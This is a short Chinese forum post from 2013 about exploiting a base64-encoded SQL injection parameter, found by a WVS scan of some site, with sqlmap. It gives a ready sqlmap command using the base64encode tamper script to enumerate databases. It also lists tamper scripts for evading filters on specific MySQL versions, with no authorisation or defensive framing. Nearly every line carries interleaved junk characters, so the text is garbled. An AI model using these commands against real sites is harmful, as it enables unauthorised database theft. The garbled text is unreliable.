WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?5 w9 X% z9 ~( ~
' \7 B2 e3 k! H& Z
sqlmap的tamper里有个base64encode.py+ y+ I" \0 X# Z2 Z4 t7 Y9 V c
; o3 E$ {* a$ _1 ^, _使用如下/ a- ~* s* H1 P" a6 F9 p# N, p; g
( t' ? x1 ^5 P% }! j7 Psqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
8 f" p+ t8 _3 W/ a( n4 O
' |0 j4 F# X7 n# n$ Q
6 a) e9 f# c: l1 P: \/ W+ Gsqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”0 F; Y) [' @" D9 f6 E; P9 u' W
% k$ E+ _+ U( |: r! Q- P% T
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
' i! o+ F& N0 a$ C1 N. R6 l: w; ] e# `3 `, Q B
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入* _# s' Q! ?/ G# A$ a1 e" T
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入# B8 h- g! m7 B! Y
首先确定目标数据库版本,然后选择相应的脚本。
# b& Y7 i. u5 d$ K0 r+ ?-v 3 --batch --tamper "space2hash.py"
( I c2 L; E; l) `
+ D4 w$ m' n* y" B还有其他一些插件:
# x- Q# _2 G# j- O4 W% Y/ J% |encodes编码 ——charencode.py$ Q( h. C; H% d2 P% ~
base64编码 —— base64encode.py
* e" n9 l# t" M% D替换空格和关键字 —— halfversionedmorekeywords.py
4 E- [, K% C% V' k) { |
1 t+ X- M/ ]' o' ?/ k5 N
9 c& q7 N) D ?. X1 z( L! y4 L, ]) H9 p$ o( w( J
% I- |5 K. v# V' E; k& K
|
发表于 2013-11-23 15:50:45
收藏
支持
反对